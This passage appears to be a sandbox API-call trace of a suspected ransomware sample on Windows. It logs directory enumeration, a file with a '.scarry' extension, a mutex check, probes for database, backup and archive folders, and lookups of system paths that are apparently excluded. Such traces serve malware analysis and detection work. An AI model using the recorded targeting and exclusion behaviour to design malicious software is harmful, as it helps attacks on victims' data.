lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0103.654] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0103.654] GetLastError () returned 0x12 [0103.655] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0103.655] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.655] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.655] GlobalUnlock (hMem=0x45000c) returned 0 [0103.655] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.655] GlobalLock (hMem=0x450004) returned 0x588000 [0103.655] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.655] GlobalUnlock (hMem=0x45000c) returned 0 [0103.655] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.655] GlobalUnlock (hMem=0x450004) returned 0 [0103.655] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x575308 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, 
ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f4Bw=XvJqdf6BYP1mVw.scarry", cAlternateFileName="F4BW_X~1.SCA")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0103.655] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0103.656] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, 
ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0103.656] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac8 | out: lpLocalFileTime=0x18fac8) returned 1 [0103.656] FileTimeToDosDateTime (in: lpFileTime=0x18fac8, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.656] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.656] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.656] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.656] GlobalLock (hMem=0x450004) returned 0x588000 [0103.656] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.656] GlobalUnlock (hMem=0x45000c) returned 0 [0103.656] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.656] GlobalUnlock (hMem=0x450004) returned 0 [0103.656] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.657] SysReAllocStringLen (in: pbstr=0x18fac4*=0x0, psz="C:\\PerfLogs", len=0xb | out: 
pbstr=0x18fac4*="C:\\PerfLogs") returned 1 [0103.657] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.657] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.657] GlobalUnlock (hMem=0x450004) returned 0 [0103.657] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.657] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.657] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.657] GlobalUnlock (hMem=0x450004) returned 0 [0103.657] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.657] GlobalUnlock (hMem=0x45000c) returned 0 [0103.657] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft\\Exchange Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="䱈@ⷘWⶬW企@\x18㵤V頻\x18\x1b")) returned 0xffffffff [0103.657] GetLastError () returned 0x3 [0103.657] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.657] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=26, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\") returned 21 [0103.658] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft SQL Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@ⶔW企@\x18㶬V頻\x181")) returned 0xffffffff [0103.658] GetLastError () returned 0x2 [0103.658] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d310, cbMultiByte=21, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\") returned 9 [0103.659] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Firebird", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@練W企@\x18㡤X頻\x18;")) returned 0xffffffff [0103.659] GetLastError () returned 0x2 [0103.659] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\") returned 
8 [0103.659] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\MSSQL.1", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥼X頻\x18D")) returned 0xffffffff [0103.659] GetLastError () returned 0x2 [0103.660] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.660] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@건V企@\x18ⶔW頻\x18j")) returned 0xffffffff [0103.660] GetLastError () returned 0x2 [0103.660] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, 
cbMultiByte=37, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.661] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Adobe", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@紌X企@\x18㥔X頻\x18q")) returned 0xffffffff [0103.661] GetLastError () returned 0x2 [0103.661] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="adobe\\ⶐWP") returned 6 [0103.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.661] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Oracle", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 
dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥼X頻\x18y")) returned 0xffffffff [0103.663] GetLastError () returned 0x2 [0103.664] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.664] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Archive", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㶬V企@\x18㤬X頻\x18\x81")) returned 0xffffffff [0103.664] GetLastError () returned 0x2 [0103.664] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.665] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Backup", lpFindFileData=0x18f540 | out: 
lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㥔X頻\x18\x88")) returned 0xffffffff [0103.665] GetLastError () returned 0x2 [0103.665] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="backup㤨X ") returned 6 [0103.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\\x18\x18?眔") returned 6 [0103.665] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Reserv", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㶬V企@\x18㥼X頻\x18\x8f")) returned 0xffffffff [0103.665] GetLastError () returned 0x2 [0103.666] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="reserv㥐X ") returned 6 [0103.666] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\\x18\x18?眔") returned 7 [0103.666] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Restore", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58a010, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Ώގ", cAlternateFileName="㟬X䱠@㵤V企@\x18㤬X頻\x18\x97")) returned 0xffffffff [0103.666] GetLastError () returned 0x2 [0103.666] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.667] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.667] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.667] GlobalUnlock (hMem=0x45000c) returned 0 [0103.667] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.667] GlobalLock (hMem=0x450004) returned 0x588000 [0103.667] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.667] GlobalUnlock (hMem=0x45000c) returned 0 [0103.667] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.667] GlobalUnlock (hMem=0x450004) returned 0 [0103.669] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.669] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aae8, cbMultiByte=15, lpWideCharStr=0x18e73c, 
cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.669] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.669] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 46 [0103.670] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.670] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 15 [0103.670] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.670] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.670] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99a8, cbMultiByte=11, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 11 [0103.670] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.670] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.670] GlobalUnlock (hMem=0x450004) returned 0 [0103.670] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.671] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.671] GlobalHandle 
(pMem=0x56f100) returned 0x450004 [0103.671] GlobalUnlock (hMem=0x450004) returned 0 [0103.671] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.671] GlobalUnlock (hMem=0x45000c) returned 0 [0103.671] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 15 [0103.671] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="c:\\perflogs\\") returned 0xc [0103.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=11, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\\x18\x18?眔") returned 11 [0103.671] CharLowerBuffW (in: 